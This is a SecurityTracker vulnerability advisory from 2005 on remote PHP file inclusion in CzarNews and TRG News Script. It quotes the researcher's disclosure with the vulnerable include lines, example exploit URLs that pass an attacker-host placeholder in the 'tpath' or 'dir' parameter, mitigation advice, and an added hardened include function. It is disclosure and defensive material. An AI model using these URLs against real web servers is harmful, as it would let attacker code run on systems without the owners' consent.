SecurityTracker.com
Category:   Application (Forum/Board/Portal)  >   CzarNews
Vendors:   Czaries Network
CzarNews Include File Hole Lets Remote Users Execute Arbitrary Commands
SecurityTracker Alert ID:  1013486
SecurityTracker URL:  http://securitytracker.com/id/1013486
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Mar 21 2005
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 1.13b
Description:   Frank 'brOmstar' Reissner from [In]Security Research reported a vulnerability in CzarNews. A remote user can execute arbitrary commands on the target system.

Several scripts do not properly validate user-supplied input to prevent remote PHP code from being included. A remote user can supply a URL with a specially crafted 'dir' parameter to cause arbitrary PHP code from a remote server to be included and executed by the target web service. The PHP code, including operating system commands, will run with the privileges of the target web service.

The following files are affected:

install\article.php
install\authorall.php
install\comment.php
install\display.php
install\displayall.php

Other files are also affected.

If 'register_globals' and 'allow_url_fopen' are set to 'on' in the 'php.ini' configuration file, then this flaw can be exploited.

A demonstration exploit URL to execute 'newsconfig.php' from the attacker's system is provided:

http://[target]/research/news/trg_news30/trgnews/install/article.php?dir=http://[attacker]

Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.czaries.net/scripts/
Cause:   Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  Two Php Application Vulnerabilities


Two little vulns I have discovered

#################################################################
#
#  [In]Security Research 2005-001 	
#
#  	Affected Software: 	CzarNews (v1.13b) 
#	Impact:			Remote File Inclusion	
#	Url:			http://www.czaries.net/scripts/
#	
#	Date:			2k5-03-18
#
#################################################################

Software:
=========

CzarNews (v1.13b)
News Manager - Requires: php 4.x (safe_mode OFF), MySQL
Released on: 10-13-2004 @ 7:17 PM by Czaries
A free full-featured news manager that allows you to post news effortlessly
and easily. 
Includes: Unlimited users, each with custom permissions, unlimited posting
categories, web-based configuration, and a complete auto-installer for a
quick setup in minutes.



Vulnerability:
==============

Remote file inclusion in headlines.php and news.php via the tpath parameter.


headlines.php
-------------

require_once($tpath . "cn_config.php");


news.php
--------

require_once($tpath . "cn_config.php");


Example:
========

If register_globals=on and allow_url_fopen=on:

http://192.168.0.115/research/news/CzarNewsv113b/headlines.php?tpath=http://attackerip/
http://192.168.0.115/research/news/CzarNewsv113b/news.php?tpath=http://attackerip/

where the file for inclusion must be named cn_config.php ->
http://attackerip/cn_config.php


Solution:
=========

Make a simple check if the file exists with the file_exists function or
deactivate register_globals || allow_url_fopen.


#################################################################

greetings 2 buzzdee and the whole gsO team  ;) 





And 

#################################################################
#
#  [In]Security Research 2005-002 	
#
#  	Affected Software: 	TRG News Script(3.0)
#	Impact:			Remote File Inclusion	
#	Url:			http://www.hotscripts.com/jump.php?listing_id=17852&jump_type=1
#	
#	Date:			2k5-03-19
#
#################################################################

Software:
=========

The TRG News Script is an easily customizable news posting script. By simply
pasting a small block of code on your page, the TRG News Script will display
your newly posted material there. This script requires an SQL database.


Vulnerability:
==============

Remote file inclusion in 

install\article.php
install\authorall.php
install\comment.php
install\display.php
install\displayall.php


and many more files


via the dir parameter.


include("$dir/newsconfig.php");

or

include("$dir/authorall.class.php");

or 

include("$dir/comments.class.php");

or

include("$dir/news.class.php");

or

include("$dir/newsall.class.php");

or

and more and more  ;) 


Example:
========

If register_globals=on and allow_url_fopen=on:

http://192.168.0.115/research/news/trg_news30/trgnews/install/article.php?dir=http://attackerip/

where the file for inclusion must be named newsconfig.php ->
http://attackerip/newsconfig.php


Solution:
=========

Make a simple check if the file exists with the file_exists function or
deactivate register_globals || allow_url_fopen.


#################################################################

greetings 2 buzzdee and the whole gsO team  ;) 
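
A hardened form of the include pattern quoted in the message above, added here as an example; it is not part of the original advisory and is not code from CzarNews or TRG News. The function name safe_include_path and the layout (config file stored next to the script) are assumptions.

```php
<?php
// Added example, not project code. safe_include_path() and the directory
// layout are hypothetical names chosen for illustration.

/**
 * Resolve $file inside $baseDir and return its canonical path.
 * Throws if the name carries a URL/stream wrapper or escapes $baseDir.
 */
function safe_include_path(string $baseDir, string $file): string
{
    // Reject any scheme prefix (http://, ftp://, php://, data:, ...) and NUL bytes.
    if (preg_match('#^[a-z][a-z0-9+.\-]*:#i', $file) || strpos($file, "\0") !== false) {
        throw new InvalidArgumentException('wrapper or NUL byte in include name');
    }

    $base = realpath($baseDir);
    if ($base === false) {
        throw new RuntimeException('base directory missing');
    }
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;

    // realpath() resolves ../ and symlinks and returns false if the file is absent.
    $full = realpath($prefix . $file);
    if ($full === false || strncmp($full, $prefix, strlen($prefix)) !== 0) {
        throw new RuntimeException('include target outside base directory');
    }
    return $full;
}

// Vulnerable pattern from the advisory: the script never assigns $dir or
// $tpath itself, so with register_globals=on the query string defines it:
//     include("$dir/newsconfig.php");
//     require_once($tpath . "cn_config.php");

// Hardened: the directory is set by the script, never taken from the request,
// and the resolved path must stay inside it.
$dir = __DIR__;
try {
    require_once safe_include_path($dir, 'newsconfig.php');
} catch (Throwable $e) {
    http_response_code(500);
    exit('configuration not available');
}
```

Assigning $dir in the script before the include removes the dependency on register_globals; on PHP 5.2 and later, allow_url_include=Off additionally stops include and require from fetching remote URLs.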



 
 



Copyright 2019, SecurityGlobal.net LLC